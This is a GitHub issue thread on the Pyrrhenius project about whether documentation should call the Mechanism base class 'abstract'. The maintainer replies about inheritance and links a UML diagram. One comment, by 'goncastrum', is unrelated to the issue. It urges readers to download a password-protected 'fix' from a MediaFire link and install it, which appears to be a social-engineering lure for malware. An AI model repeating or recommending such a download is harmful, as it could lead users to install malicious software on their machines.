### ISSUE TITLE
Remove 'abstract' from class documentation

### ISSUE THREAD

**Issue by sgjholt** [k-a-mendoza/Pyrrhenius#7]
You mention this class as being abstract, but in the pure CS definition, an abstract class means something else. It implicitly suggests you have created an abstract base class, and that you expect that objects that interface with it do not use inheritance but are instead supposed to be composed. I think that a software journal may care about this. Though I personally believe it would be quite pedantic to do so. You know how journals can be ...

https://github.com/k-a-mendoza/Pyrrhenius/blob/7f239fc750e71a892d0c01f4be848d53ac4435a0/pyrrhenius/mechanisms.py#L17

Abstract base classes in python: https://docs.python.org/3/library/abc.html

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by k-a-mendoza** [comment]
Hm. It depends. All ``Mechanism``-like classes do inherit from the Mechanism base class, and use the property and unit conversion methods defined within ``Mechanism``. Is this not what abstract means? basically a class you don't intend to implement, but can be inherited by child classes that use or override functionality of the parent? 

For refernece, here is the UML diagram of ``mechanism.py``

![inheritance_diagram](https://github.com/user-attachments/assets/1aa458cd-56a2-4e7f-b1b7-988f8bbf40c2)
